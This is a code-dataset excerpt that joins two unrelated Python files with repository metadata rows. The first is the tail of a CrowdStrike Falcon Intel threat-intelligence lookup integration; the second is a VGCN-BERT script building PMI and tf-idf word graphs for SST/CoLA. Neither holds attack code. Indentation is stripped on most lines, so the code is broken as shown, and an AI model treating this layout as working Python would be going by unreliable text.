operator: Optional[str] = self.date_params.get(key, {}).get('operator')
api_key: Optional[str] = self.date_params.get(key, {}).get('api_key')
                    # Parse the date argument (ISO format or free-form text) into a datetime
                    # object, replace its TZ with UTC, and convert it to a truncated integer
                    # timestamp.
parsed_date = parse(args[key])
assert parsed_date is not None
filter_query += f"{api_key}:" \
f"{operator}{int(parsed_date.replace(tzinfo=timezone.utc).timestamp())}+"
if filter_query.endswith('+'):
filter_query = filter_query[:-1]
return filter_query
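    # Worked example: given
    #   args = {'type': 'domain', 'malicious_confidence': 'high,medium'}
    # build_filter_query returns the FQL string
    #   "type:'domain'+malicious_confidence:'high'+malicious_confidence:'medium'"
    # Date arguments go through self.date_params instead, e.g.
    # 'max_last_activity_date' becomes "last_activity_date:<=<utc timestamp>".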
def get_indicator(self, indicator_value: str) -> Dict[str, Any]:
        # CrowdStrike does not allow passing single quotes, so we encode them.
        # We do not encode the entire indicator value, as the other reserved chars (such as + and &) are allowed.
indicator_value = indicator_value.replace("'", "%27")
args: Dict[str, Any] = {
'indicator': indicator_value,
'limit': 1
}
params: Dict[str, Any] = self.build_request_params(args)
return self.cs_client.http_request(method='GET', url_suffix='intel/combined/indicators/v1', params=params)
def cs_actors(self, args: Dict[str, str]) -> Dict[str, Any]:
params: Dict[str, Any] = self.build_request_params(args)
return self.cs_client.http_request(method='GET', url_suffix='intel/combined/actors/v1', params=params)
def cs_indicators(self, args: Dict[str, str]) -> Dict[str, Any]:
params: Dict[str, Any] = self.build_request_params(args)
return self.cs_client.http_request(method='GET', url_suffix='intel/combined/indicators/v1', params=params)
def cs_reports(self, args: Dict[str, str]) -> Dict[str, Any]:
params: Dict[str, Any] = self.build_request_params(args)
return self.cs_client.http_request(method='GET', url_suffix='intel/combined/reports/v1', params=params)
''' HELPER FUNCTIONS '''
def get_dbot_score_type(indicator_type: str) -> Union[Exception, DBotScoreType, str]:
"""
Returns the dbot score type
:param indicator_type: The indicator type
:return: The dbot score type
"""
if indicator_type == 'ip':
return DBotScoreType.IP
elif indicator_type == 'domain':
return DBotScoreType.DOMAIN
elif indicator_type == 'file' or indicator_type == 'hash':
return DBotScoreType.FILE
elif indicator_type == 'url':
return DBotScoreType.URL
else:
raise DemistoException('Indicator type is not supported.')
def get_score_from_resource(r: Dict[str, Any]) -> int:
"""
Calculates the DBotScore for the resource
:param r: The resource
:return: The DBotScore
"""
malicious_confidence: int = MALICIOUS_DICTIONARY.get(r.get('malicious_confidence'), 0)
if malicious_confidence == 3 or MALICIOUS_THRESHOLD == 1:
score = 3
elif malicious_confidence == 2 or MALICIOUS_THRESHOLD == 2:
score = 2
else:
score = 1
return score
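# Worked example of the thresholding above: MALICIOUS_DICTIONARY maps
# low/medium/high to DBot scores 1/2/3. With threshold 'high'
# (MALICIOUS_THRESHOLD == 3), a 'high' confidence scores 3, 'medium' scores 2
# and 'low' scores 1; with threshold 'low' (MALICIOUS_THRESHOLD == 1) the
# first branch always fires, so every resource scores 3 (Bad).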
def get_indicator_hash_type(indicator_value: str) -> Union[str, Exception]:
"""
Calculates the type of the hash
:param indicator_value: The hash value
:return: The hash type
"""
length: int = len(indicator_value)
if length == 32:
return 'hash_md5'
elif length == 40:
return 'hash_sha1'
elif length == 64:
return 'hash_sha256'
else:
raise DemistoException(f'Invalid hash. Hash length is: {length}. Please provide either MD5 (32 length)'
f', SHA1 (40 length) or SHA256 (64 length) hash.')
def get_indicator_object(indicator_value: Any, indicator_type: str, dbot_score: Common.DBotScore) \
-> Union[Common.IP, Common.URL, Common.File, Common.Domain, None]:
"""
Returns the corresponding indicator common object
:param indicator_value: The indicator value
:param indicator_type: The indicator value
:param dbot_score: The indicator DBotScore
:return: The indicator common object
"""
if indicator_type == 'ip':
return Common.IP(
ip=indicator_value,
dbot_score=dbot_score
)
elif indicator_type == 'url':
return Common.URL(
url=indicator_value,
dbot_score=dbot_score
)
elif indicator_type == 'hash':
hash_type: Union[str, Exception] = get_indicator_hash_type(indicator_value)
if hash_type == 'hash_md5':
return Common.File(
md5=indicator_value,
dbot_score=dbot_score
)
elif hash_type == 'hash_sha1':
return Common.File(
sha1=indicator_value,
dbot_score=dbot_score
)
else:
return Common.File(
sha256=indicator_value,
dbot_score=dbot_score
)
elif indicator_type == 'domain':
return Common.Domain(
domain=indicator_value,
dbot_score=dbot_score
)
else:
return None
def should_filter_resource_by_type(resource, indicator_type, indicator_value):
"""
checks if a resource should be filtered by his type.
:param resource: The resource object
:param indicator_type: The indicator type
:param indicator_value: The indicator value
:return: True if the resource should be filtered (don't match the indicator type) or False otherwise.
"""
# indicator type was not filtered using the query due to a bug in the CrowdStrike API.
if indicator_type == 'hash':
filter_type = get_indicator_hash_type(indicator_value)
elif indicator_type == 'ip':
filter_type = 'ip_address'
else:
filter_type = indicator_type
return resource.get('type') != filter_type
def build_indicator(indicator_value: str, indicator_type: str, title: str, client: Client) -> List[CommandResults]:
"""
Builds an indicator entry
:param indicator_value: The indicator value
:param indicator_type: The indicator type
:param title: The title to show to the user
:param client: The integration's client
:return: The indicator entry
"""
res: Dict[str, Any] = client.get_indicator(indicator_value)
resources: List[Any] = res.get('resources', [])
results: List[CommandResults] = []
if resources:
for r in resources:
if should_filter_resource_by_type(r, indicator_type, indicator_value):
continue
output = get_indicator_outputs(r)
score = get_score_from_resource(r)
dbot_score = Common.DBotScore(
indicator=indicator_value,
indicator_type=get_dbot_score_type(indicator_type),
integration_name='CrowdStrike Falcon Intel v2',
malicious_description='High confidence',
score=score,
reliability=client.reliability
)
indicator = get_indicator_object(indicator_value, indicator_type, dbot_score)
results.append(CommandResults(
outputs=output,
outputs_prefix='FalconIntel.Indicator',
outputs_key_field='ID',
indicator=indicator,
readable_output=tableToMarkdown(name=title, t=output, headerTransform=pascalToSpace),
raw_response=res
))
else:
results.append(create_indicator_result_with_dbotscore_unknown(indicator=indicator_value,
indicator_type=DBotScoreType.FILE
if indicator_type == 'hash' else indicator_type))
return results
def get_values(items_list: List[Any], return_type: str = 'str', keys: Union[str, List[Any]] = 'value') \
-> Union[str, List[Union[str, Dict]]]:
"""
Returns the values of list's items
:param items_list: The items list
:param return_type: Whether to return string or list
:param keys: The key to get the data
:return: The values list
"""
new_list: List[Any] = list()
if isinstance(keys, str):
new_list = [item.get(keys) for item in items_list]
elif isinstance(keys, list):
new_list = [{underscoreToCamelCase(f): item.get(f) for f in item if f in keys} for item in items_list]
if return_type == 'list':
return new_list
return ', '.join(str(item) for item in new_list)
def get_indicator_outputs(resource: Dict[str, Any]) -> Dict[str, Any]:
"""
Build the output and extra context of an indicator
:param resource: The indicator's object
:return: The indicator's human readable
"""
output: Dict[str, Any] = dict()
if resource:
indicator_id = resource.get('id')
indicator_value = resource.get('indicator')
indicator_type = resource.get('type')
last_update = resource.get('last_update')
publish_date = resource.get('publish_date')
malicious_confidence = resource.get('malicious_confidence')
reports = resource.get('reports')
actors = resource.get('actors')
malware_families = resource.get('malware_families')
kill_chains = resource.get('kill_chains')
domain_types = resource.get('domain_types')
ip_address_types = resource.get('ip_address_types')
relations: List[Any] = resource.get('relations', [])[:10]
labels: List[Any] = resource.get('labels', [])[:10]
output = assign_params(**{
'ID': indicator_id,
'Type': indicator_type,
'Value': indicator_value,
'LastUpdate': datetime.fromtimestamp(last_update, timezone.utc).isoformat() if last_update
else None,
'PublishDate': datetime.fromtimestamp(publish_date, timezone.utc).isoformat() if publish_date
else None,
'MaliciousConfidence': malicious_confidence,
'Reports': reports,
'Actors': actors,
'MalwareFamilies': malware_families,
'KillChains': kill_chains,
'DomainTypes': domain_types,
'IPAddressTypes': ip_address_types,
'Relations': [f'{item.get("Type")}: {item.get("Indicator")}' for item in # type: ignore
get_values(relations, return_type='list', keys=['indicator', 'type'])],
'Labels': get_values(labels, return_type='list', keys='name')
})
return output
''' COMMANDS '''
def run_test_module(client: Client) -> Union[str, Exception]:
"""
If a client is successfully constructed then an access token was successfully created,
therefore the username and password are valid and a connection was made.
On top of the above, this function validates the http request to indicators endpoint.
:param client: the client object with an access token
:return: ok if got a valid access token and not all the quota is used at the moment
"""
client.cs_client.http_request('GET', 'intel/combined/indicators/v1', params={'limit': 1})
return 'ok'
def file_command(files: List, client: Client) -> List[CommandResults]:
results: List[CommandResults] = []
for file in files:
results += build_indicator(file, 'hash', 'Falcon Intel file reputation:\n', client)
return results
def ip_command(ips: List, client: Client) -> List[CommandResults]:
results: List[CommandResults] = []
for ip in ips:
results += build_indicator(ip, 'ip', 'Falcon Intel IP reputation:\n', client)
return results
def url_command(urls: List, client: Client) -> List[CommandResults]:
results: List[CommandResults] = []
for url in urls:
results += build_indicator(url, 'url', 'Falcon Intel URL reputation:\n', client)
return results
def domain_command(domains: List, client: Client) -> List[CommandResults]:
results: List[CommandResults] = []
for domain in domains:
results += build_indicator(domain, 'domain', 'Falcon Intel domain reputation:\n', client)
return results
def cs_actors_command(client: Client, args: Dict[str, str]) -> CommandResults:
res: Dict[str, Any] = client.cs_actors(args)
resources: List[Any] = res.get('resources', [])
outputs: List[Dict[str, Any]] = list()
md_outputs: List[Dict[str, Any]] = list()
md: str = str()
title: str = 'Falcon Intel Actor search:'
if resources:
for r in resources:
image_url = r.get('image', {}).get('url')
name = r.get('name')
actor_id = r.get('id')
url = r.get('url')
slug = r.get('slug')
short_description = r.get('short_description')
first_activity_date = r.get('first_activity_date')
last_activity_date = r.get('last_activity_date')
active = r.get('active')
known_as = r.get('known_as')
target_industries = r.get('target_industries', [])
target_countries = r.get('target_countries', [])
origins = r.get('origins', [])
motivations = r.get('motivations', [])
capability = r.get('capability', {}).get('value')
group = r.get('group')
region = r.get('region', {}).get('value')
kill_chain = r.get('kill_chain')
output: Dict[str, Any] = assign_params(**{
'ImageURL': image_url,
'Name': name,
'ID': actor_id,
'URL': url,
'Slug': slug,
'ShortDescription': short_description,
'FirstActivityDate': datetime.fromtimestamp(first_activity_date, timezone.utc).isoformat()
if first_activity_date else None,
'LastActivityDate': datetime.fromtimestamp(last_activity_date, timezone.utc).isoformat()
if last_activity_date else None,
'Active': active,
'KnownAs': known_as,
'TargetIndustries': get_values(target_industries, return_type='list'),
'TargetCountries': get_values(target_countries, return_type='list'),
'Origins': get_values(origins, return_type='list'),
'Motivations': get_values(motivations, return_type='list'),
'Capability': capability,
'Group': group,
'Region': region,
'KillChains': kill_chain
})
outputs.append(output)
md_output: Dict[str, Any] = output
for key in ('URL', 'ImageURL'):
if key in md_output:
value = md_output[key]
md_output[key] = f'[{value}]({value})'
md_outputs.append(md_output)
else:
md = 'No actors found.'
results: CommandResults = CommandResults(
outputs=outputs,
outputs_key_field='ID',
outputs_prefix='FalconIntel.Actor',
readable_output=md if md else tableToMarkdown(name=title, t=md_outputs, headerTransform=pascalToSpace),
raw_response=res
)
return results
def cs_indicators_command(client: Client, args: Dict[str, str]) -> List[CommandResults]:
res: Dict[str, Any] = client.cs_indicators(args)
resources: List[Any] = res.get('resources', [])
results: List[CommandResults] = []
title: str = 'Falcon Intel Indicator search:'
if resources:
for r in resources:
output = get_indicator_outputs(r)
indicator_value = output.get('Value')
indicator_type = output.get('Type')
indicator: Optional[Common.Indicator] = None
if indicator_type in ('hash_md5', 'hash_sha256', 'hash_sha1', 'ip_address', 'url', 'domain'):
if indicator_type in ('hash_md5', 'hash_sha1', 'hash_sha256'):
indicator_type = 'hash'
elif indicator_type == 'ip_address':
indicator_type = 'ip'
score = get_score_from_resource(r)
dbot_score = Common.DBotScore(
indicator=indicator_value,
indicator_type=get_dbot_score_type(indicator_type),
integration_name='CrowdStrike Falcon Intel v2',
malicious_description='High confidence',
score=score,
reliability=client.reliability
)
indicator = get_indicator_object(indicator_value, indicator_type, dbot_score)
results.append(CommandResults(
outputs=output,
outputs_prefix='FalconIntel.Indicator',
outputs_key_field='ID',
readable_output=tableToMarkdown(name=title, t=output, headerTransform=pascalToSpace),
raw_response=res,
indicator=indicator
))
else:
results.append(CommandResults(
readable_output='No indicators found.'
))
return results
def cs_reports_command(client: Client, args: Dict[str, str]) -> CommandResults:
res: Dict[str, Any] = client.cs_reports(args)
resources: List[Any] = res.get('resources', [])
outputs: List[Dict[str, Any]] = list()
md_outputs: List[Dict[str, Any]] = list()
md: str = str()
title: str = 'Falcon Intel Report search:'
if resources:
for r in resources:
report_id: int = r.get('id')
url: str = r.get('url')
name: str = r.get('name')
report_type: str = r.get('type', {}).get('name')
sub_type: str = r.get('sub_type', {}).get('name')
slug: str = r.get('slug')
created_date: int = r.get('created_date')
last_modified_date: int = r.get('last_modified_date')
short_description: str = r.get('short_description')
target_industries: List[Any] = r.get('target_industries', [])
target_countries: List[Any] = r.get('target_countries', [])
motivations: List[Any] = r.get('motivations', [])
tags: List[Any] = r.get('tags', [])
actors: List[Any] = r.get('actors', [])
output: Dict[str, Any] = assign_params(**{
'ID': report_id,
'URL': url,
'Name': name,
'Type': report_type,
'SubType': sub_type,
'Slug': slug,
'CreatedDate': datetime.fromtimestamp(created_date, timezone.utc).isoformat()
if created_date else None,
                'LastModifiedDate': datetime.fromtimestamp(last_modified_date, timezone.utc).isoformat()
if last_modified_date else None,
'ShortDescription': short_description,
'TargetIndustries': get_values(target_industries, return_type='list'),
'TargetCountries': get_values(target_countries, return_type='list'),
'Motivations': get_values(motivations, return_type='list'),
'Tags': get_values(tags, return_type='list'),
'Actors': get_values(actors, return_type='list', keys='name')
})
outputs.append(output)
md_output: Dict[str, Any] = output
if 'URL' in md_output:
value = md_output['URL']
md_output['URL'] = f'[{value}]({value})'
md_outputs.append(md_output)
else:
md = 'No reports found.'
results: CommandResults = CommandResults(
outputs_prefix='FalconIntel.Report',
outputs=outputs,
outputs_key_field='ID',
readable_output=md if md else tableToMarkdown(name=title, t=outputs, headerTransform=pascalToSpace),
raw_response=res
)
return results
def main():
params: Dict[str, str] = demisto.params()
reliability = params.get('integrationReliability', 'C - Fairly reliable')
reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability) if \
DBotScoreReliability.is_valid_type(reliability) else None
args: Dict[str, str] = demisto.args()
results: Union[CommandResults, List[CommandResults]]
try:
command: str = demisto.command()
LOG(f'Command being called in CrowdStrike Falcon Intel v2 is: {command}')
client: Client = Client(params=params, reliability=reliability)
if command == 'test-module':
result: Union[str, Exception] = run_test_module(client)
return_results(result)
elif command == 'file':
results = file_command(argToList(args['file']), client)
return_results(results)
elif command == 'ip':
results = ip_command(argToList(args['ip']), client)
return_results(results)
elif command == 'url':
results = url_command(argToList(args['url']), client)
return_results(results)
elif command == 'domain':
results = domain_command(argToList(args['domain']), client)
return_results(results)
elif command == 'cs-actors':
results = cs_actors_command(client, args)
return_results(results)
elif command == 'cs-indicators':
results = cs_indicators_command(client, args)
return_results(results)
elif command == 'cs-reports':
results = cs_reports_command(client, args)
return_results(results)
else:
            raise NotImplementedError(f'{command} is not an existing command in the CrowdStrike Falcon Intel v2 integration')
except Exception as err:
return_error(f'Unexpected error:\n{str(err)}', error=traceback.format_exc())
from CrowdStrikeApiModule import * # noqa: E402
if __name__ in ('__main__', 'builtin', 'builtins'):
main()
|
df968a1d81f0664eb73e4516ccc29408cdff3a17
|
7dc91600571f5f8985dbc86b3e0396ee681af477
|
/vgcn_bert/prepare_data.py
|
6408a379f72e1718a4d66b9c28eb2626bc0b7c63
|
[
"MIT"
] |
permissive
|
Louis-udm/VGCN-BERT
|
e27531d37c42740c5172b698474bd1426afddcb6
|
6d2edd3161f0881d074029e60aaab69b8fc2ca75
|
refs/heads/master
| 2023-07-13T03:29:10.130148
| 2023-07-03T14:43:18
| 2023-07-03T14:43:18
| 235,446,882
| 124
| 40
|
MIT
| 2021-05-04T05:10:20
| 2020-01-21T21:39:11
|
Python
|
UTF-8
|
Python
| false
| false
| 18,368
|
py
|
prepare_data.py
|
# -*- coding: utf-8 -*-
# @author Zhibin.LU
# @website: https://github.com/Louis-udm
"""pre-process data and prepare the vocabulary graph"""
import argparse
import os
import pickle as pkl
import random
import re
import sys
import time
import nltk
import numpy as np
import pandas as pd
import scipy.sparse as sp
from nltk.corpus import stopwords
from sklearn.utils import shuffle
from vgcn_bert.env_config import env_config
from vgcn_bert.utils import clean_str, del_http_user_tokenize
random.seed(env_config.GLOBAL_SEED)
np.random.seed(env_config.GLOBAL_SEED)
# import torch
# cuda_yes = torch.cuda.is_available()
# device = torch.device("cuda:0" if cuda_yes else "cpu")
# torch.manual_seed(44)
# if cuda_yes:
# torch.cuda.manual_seed_all(44)
"""
Config:
"""
parser = argparse.ArgumentParser()
parser.add_argument("--ds", type=str, default="cola")
parser.add_argument("--sw", type=int, default=0)
args = parser.parse_args()
cfg_ds = args.ds
cfg_del_stop_words = True if args.sw == 1 else False
dataset_list = {"sst", "cola"}
if cfg_ds not in dataset_list:
sys.exit("Dataset choice error!")
will_dump_objects = True
dump_dir = f"data/preprocessed/{cfg_ds}/"
if not os.path.exists(dump_dir):
os.makedirs(dump_dir)
if cfg_del_stop_words:
freq_min_for_word_choice = 5
# freq_min_for_word_choice=10 #best
else:
freq_min_for_word_choice = 1 # for bert+
valid_data_taux = 0.05
test_data_taux = 0.10
# word co-occurence with context windows
window_size = 20
if cfg_ds in ("mr", "sst", "cola"):
window_size = 1000 # use whole sentence
tfidf_mode = "only_tf"
# tfidf_mode='all_tfidf'
# Whether to use the bert_tokenizer to split words when cleaning docs; for data3 it is better not to.
cfg_use_bert_tokenizer_at_clean = True
# bert_model_scale='bert-large-uncased'
bert_model_scale = "bert-base-uncased"
if env_config.TRANSFORMERS_OFFLINE == 1:
bert_model_scale = os.path.join(
env_config.HUGGING_LOCAL_MODEL_FILES_PATH,
f"hf-maintainers_{bert_model_scale}",
)
bert_lower_case = True
print("---data prepare configure---")
print(
f"Data set: {cfg_ds}",
f"freq_min_for_word_choice {freq_min_for_word_choice}",
f"window_size {window_size}",
)
print(
f"del_stop_words {cfg_del_stop_words}",
f"use_bert_tokenizer_at_clean {cfg_use_bert_tokenizer_at_clean}",
)
print(
f"tfidf-mode {tfidf_mode}",
f"bert_model_scale {bert_model_scale}",
f"bert_lower_case {bert_lower_case}",
)
print("\n")
"""
Get the tweets,y,confidence etc from data file
"""
print("Get the tweets,y,confidence etc from data file...")
start = time.time()
if cfg_ds == "sst":
from get_sst_data import DataReader
train, valid, test = DataReader(
"data/SST-2/train.txt", "./data/SST-2/dev.txt", "./data/SST-2/test.txt"
).read()
random.shuffle(train)
random.shuffle(valid)
random.shuffle(test)
train_size = len(train)
valid_size = len(valid)
test_size = len(test)
print(
"SST-2, train_szie:%d, valid_size:%d, test_size:%d"
% (train_size, valid_size, test_size)
)
trainset = {}
validset = {}
testset = {}
for data, dataset in [
(train, trainset),
(valid, validset),
(test, testset),
]:
label = []
all_text = []
for line in data:
label.append(line[0])
all_text.append(line[1])
dataset["label"] = label
dataset["data"] = all_text
label2idx = {label: i for i, label in enumerate(testset["label"])}
idx2label = {i: label for i, label in enumerate(testset["label"])}
corpus = trainset["data"] + validset["data"] + testset["data"]
y = np.array(trainset["label"] + validset["label"] + testset["label"])
corpus_size = len(corpus)
y_prob = np.eye(corpus_size, len(label2idx))[y]
elif cfg_ds == "cola":
label2idx = {"0": 0, "1": 1}
idx2label = {0: "0", 1: "1"}
train_valid_df = pd.read_csv(
"data/CoLA/train.tsv", encoding="utf-8", header=None, sep="\t"
)
train_valid_df = shuffle(train_valid_df)
    # use dev set as test set, because we cannot get the ground-truth labels of the real test set.
test_df = pd.read_csv(
"data/CoLA/dev.tsv", encoding="utf-8", header=None, sep="\t"
)
test_df = shuffle(test_df)
train_valid_size = train_valid_df[1].count()
valid_size = int(train_valid_size * valid_data_taux)
train_size = train_valid_size - valid_size
test_size = test_df[1].count()
print(
"CoLA train_valid Total:", train_valid_size, "test Total:", test_size
)
df = pd.concat((train_valid_df, test_df))
corpus = df[3]
y = df[1].values # y.as_matrix()
    # get the confidence
y_prob = np.eye(len(y), len(label2idx))[y]
corpus_size = len(y)
doc_content_list = []
for t in corpus:
doc_content_list.append(del_http_user_tokenize(t))
max_len_seq = 0
max_len_seq_idx = -1
min_len_seq = 1000
min_len_seq_idx = -1
sen_len_list = []
for i, seq in enumerate(doc_content_list):
seq = seq.split()
sen_len_list.append(len(seq))
if len(seq) < min_len_seq:
min_len_seq = len(seq)
min_len_seq_idx = i
if len(seq) > max_len_seq:
max_len_seq = len(seq)
max_len_seq_idx = i
print(
"Statistics for original text: max_len%d,id%d, min_len%d,id%d, avg_len%.2f"
% (
max_len_seq,
max_len_seq_idx,
min_len_seq,
min_len_seq_idx,
np.array(sen_len_list).mean(),
)
)
"""
Remove stop words from tweets
"""
print("Remove stop words from tweets...")
if cfg_del_stop_words:
from nltk.corpus import stopwords
nltk.download("stopwords")
stop_words = stopwords.words("english")
stop_words = set(stop_words)
else:
stop_words = {}
print("Stop_words:", stop_words)
tmp_word_freq = {} # to remove rare words
new_doc_content_list = []
# use bert_tokenizer for split the sentence
if cfg_use_bert_tokenizer_at_clean:
print("Use bert_tokenizer for seperate words to bert vocab")
    from pytorch_pretrained_bert import (  # for Huggingface transformers 0.6.2
        BertTokenizer,
    )
# from transformers import BertTokenizer
bert_tokenizer = BertTokenizer.from_pretrained(
bert_model_scale, do_lower_case=bert_lower_case
)
for doc_content in doc_content_list:
new_doc = clean_str(doc_content)
if cfg_use_bert_tokenizer_at_clean:
sub_words = bert_tokenizer.tokenize(new_doc)
sub_doc = " ".join(sub_words).strip()
new_doc = sub_doc
new_doc_content_list.append(new_doc)
for word in new_doc.split():
if word in tmp_word_freq:
tmp_word_freq[word] += 1
else:
tmp_word_freq[word] = 1
doc_content_list = new_doc_content_list
# for normal dataset
clean_docs = []
count_void_doc = 0
for i, doc_content in enumerate(doc_content_list):
words = doc_content.split()
doc_words = []
for word in words:
# if tmp_word_freq[word] >= freq_min_for_word_choice:
if cfg_ds in ("mr", "sst", "cola"):
doc_words.append(word)
elif (
word not in stop_words
and tmp_word_freq[word] >= freq_min_for_word_choice
):
doc_words.append(word)
doc_str = " ".join(doc_words).strip()
if doc_str == "":
count_void_doc += 1
# doc_str = '[unk]'
# doc_str = 'normal'
# doc_str = doc_content
print(
f"No. {i}",
"is a empty doc after treat, replaced by '%s'. original:%s"
% (doc_str, doc_content),
)
clean_docs.append(doc_str)
print("Total", count_void_doc, " docs are empty.")
min_len = 10000
min_len_id = -1
max_len = 0
max_len_id = -1
aver_len = 0
for i, line in enumerate(clean_docs):
temp = line.strip().split()
aver_len = aver_len + len(temp)
if len(temp) < min_len:
min_len = len(temp)
min_len_id = i
if len(temp) > max_len:
max_len = len(temp)
max_len_id = i
aver_len = 1.0 * aver_len / len(clean_docs)
print("After tokenizer:")
print("Min_len : " + str(min_len) + " id: " + str(min_len_id))
print("Max_len : " + str(max_len) + " id: " + str(max_len_id))
print("Average_len : " + str(aver_len))
"""
Build graph
"""
print("Build graph...")
if cfg_ds in ("mr", "sst", "cola"):
shuffled_clean_docs = clean_docs
train_docs = shuffled_clean_docs[:train_size]
valid_docs = shuffled_clean_docs[train_size : train_size + valid_size]
train_valid_docs = shuffled_clean_docs[: train_size + valid_size]
train_y = y[:train_size]
valid_y = y[train_size : train_size + valid_size]
test_y = y[train_size + valid_size :]
train_y_prob = y_prob[:train_size]
valid_y_prob = y_prob[train_size : train_size + valid_size]
test_y_prob = y_prob[train_size + valid_size :]
# build vocab using the whole corpus (train+valid+test+generalization)
word_set = set()
for doc_words in shuffled_clean_docs:
words = doc_words.split()
for word in words:
word_set.add(word)
# if word in word_freq:
# word_freq[word] += 1
# else:
# word_freq[word] = 1
vocab = list(word_set)
vocab_size = len(vocab)
vocab_map = {}
for i in range(vocab_size):
vocab_map[vocab[i]] = i
# build vocab_train_valid
word_set_train_valid = set()
for doc_words in train_valid_docs:
words = doc_words.split()
for word in words:
word_set_train_valid.add(word)
vocab_train_valid = list(word_set_train_valid)
vocab_train_valid_size = len(vocab_train_valid)
# a map for word -> doc_list
if tfidf_mode == "all_tf_train_valid_idf":
for_idf_docs = train_valid_docs
else:
for_idf_docs = shuffled_clean_docs
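# "all_tf_train_valid_idf" computes document frequencies on train+valid docs only,
# so the idf statistics do not leak information from the test split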
word_doc_list = {}
for i in range(len(for_idf_docs)):
doc_words = for_idf_docs[i]
words = doc_words.split()
appeared = set()
for word in words:
if word in appeared:
continue
if word in word_doc_list:
doc_list = word_doc_list[word]
doc_list.append(i)
word_doc_list[word] = doc_list
else:
word_doc_list[word] = [i]
appeared.add(word)
word_doc_freq = {}
for word, doc_list in word_doc_list.items():
word_doc_freq[word] = len(doc_list)
"""
Doc word heterogeneous graph
and Vocabulary graph
"""
print(
"Calculate First isomerous adj and First isomorphic vocab adj, get word-word PMI values"
)
adj_y = np.hstack((train_y, np.zeros(vocab_size), valid_y, test_y))
adj_y_prob = np.vstack(
(
train_y_prob,
np.zeros((vocab_size, len(label2idx)), dtype=np.float32),
valid_y_prob,
test_y_prob,
)
)
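# node ordering in the heterogeneous graph: [train docs | vocab words | valid docs | test docs],
# matching the index offsets used below (train_size + j for word j, i + vocab_size for later docs)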
windows = []
for doc_words in train_valid_docs:
words = doc_words.split()
length = len(words)
if length <= window_size:
windows.append(words)
else:
for j in range(length - window_size + 1):
window = words[j : j + window_size]
windows.append(window)
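# a doc shorter than window_size yields a single window; otherwise it yields
# len - window_size + 1 overlapping windows for the co-occurrence counts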
print(
"Train_valid size:", len(train_valid_docs), "Window number:", len(windows)
)
word_window_freq = {}
for window in windows:
appeared = set()
for i in range(len(window)):
if window[i] in appeared:
continue
if window[i] in word_window_freq:
word_window_freq[window[i]] += 1
else:
word_window_freq[window[i]] = 1
appeared.add(window[i])
word_pair_count = {}
for window in windows:
appeared = set()
for i in range(1, len(window)):
for j in range(0, i):
word_i = window[i]
word_i_id = vocab_map[word_i]
word_j = window[j]
word_j_id = vocab_map[word_j]
if word_i_id == word_j_id:
continue
word_pair_str = str(word_i_id) + "," + str(word_j_id)
if word_pair_str in appeared:
continue
if word_pair_str in word_pair_count:
word_pair_count[word_pair_str] += 1
else:
word_pair_count[word_pair_str] = 1
appeared.add(word_pair_str)
# two orders
word_pair_str = str(word_j_id) + "," + str(word_i_id)
if word_pair_str in appeared:
continue
if word_pair_str in word_pair_count:
word_pair_count[word_pair_str] += 1
else:
word_pair_count[word_pair_str] = 1
appeared.add(word_pair_str)
from math import log
row = []
col = []
weight = []
tfidf_row = []
tfidf_col = []
tfidf_weight = []
vocab_adj_row = []
vocab_adj_col = []
vocab_adj_weight = []
num_window = len(windows)
tmp_max_npmi = 0
tmp_min_npmi = 0
tmp_max_pmi = 0
tmp_min_pmi = 0
for key in word_pair_count:
temp = key.split(",")
i = int(temp[0])
j = int(temp[1])
count = word_pair_count[key]
word_freq_i = word_window_freq[vocab[i]]
word_freq_j = word_window_freq[vocab[j]]
pmi = log(
(1.0 * count / num_window)
/ (1.0 * word_freq_i * word_freq_j / (num_window * num_window))
)
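    # PMI(i, j) = log( p(i, j) / (p(i) * p(j)) ), with probabilities estimated
    # from window counts: p(i, j) ~ count / num_window, p(i) ~ word_freq_i / num_window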
    # use normalized PMI (NPMI):
npmi = (
log(1.0 * word_freq_i * word_freq_j / (num_window * num_window))
/ log(1.0 * count / num_window)
- 1
)
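    # NPMI(i, j) = PMI(i, j) / -log p(i, j), which rearranges to the expression
    # above: log(p(i) * p(j)) / log(p(i, j)) - 1; it is bounded in [-1, 1]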
if npmi > tmp_max_npmi:
tmp_max_npmi = npmi
if npmi < tmp_min_npmi:
tmp_min_npmi = npmi
if pmi > tmp_max_pmi:
tmp_max_pmi = pmi
if pmi < tmp_min_pmi:
tmp_min_pmi = pmi
if pmi > 0:
row.append(train_size + i)
col.append(train_size + j)
weight.append(pmi)
if npmi > 0:
vocab_adj_row.append(i)
vocab_adj_col.append(j)
vocab_adj_weight.append(npmi)
print("max_pmi:", tmp_max_pmi, "min_pmi:", tmp_min_pmi)
print("max_npmi:", tmp_max_npmi, "min_npmi:", tmp_min_npmi)
print("Calculate doc-word tf-idf weight")
n_docs = len(shuffled_clean_docs)
doc_word_freq = {}
for doc_id in range(n_docs):
doc_words = shuffled_clean_docs[doc_id]
words = doc_words.split()
for word in words:
word_id = vocab_map[word]
doc_word_str = str(doc_id) + "," + str(word_id)
if doc_word_str in doc_word_freq:
doc_word_freq[doc_word_str] += 1
else:
doc_word_freq[doc_word_str] = 1
for i in range(n_docs):
doc_words = shuffled_clean_docs[i]
words = doc_words.split()
doc_word_set = set()
tfidf_vec = []
for word in words:
if word in doc_word_set:
continue
j = vocab_map[word]
key = str(i) + "," + str(j)
tf = doc_word_freq[key]
tfidf_row.append(i)
if i < train_size:
row.append(i)
else:
row.append(i + vocab_size)
tfidf_col.append(j)
col.append(train_size + j)
# smooth
idf = log((1.0 + n_docs) / (1.0 + word_doc_freq[vocab[j]])) + 1.0
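        # smoothed idf, idf(w) = log((1 + N) / (1 + df(w))) + 1, the same
        # "+1" smoothing used by scikit-learn's TfidfTransformer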
# weight.append(tf * idf)
if tfidf_mode == "only_tf":
tfidf_vec.append(tf)
else:
tfidf_vec.append(tf * idf)
doc_word_set.add(word)
if len(tfidf_vec) > 0:
weight.extend(tfidf_vec)
tfidf_weight.extend(tfidf_vec)
"""
Assemble adjacency matrix and dump to files
"""
node_size = vocab_size + corpus_size
adj_list = []
adj_list.append(
sp.csr_matrix(
(weight, (row, col)), shape=(node_size, node_size), dtype=np.float32
)
)
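# symmetrize each adjacency: A <- elementwise max(A, A^T)
# (keep A, add A^T where it is larger, subtract the overwritten entries), then unit self-loops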
for i, adj in enumerate(adj_list):
adj_list[i] = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)
adj_list[i].setdiag(1.0)
vocab_adj = sp.csr_matrix(
(vocab_adj_weight, (vocab_adj_row, vocab_adj_col)),
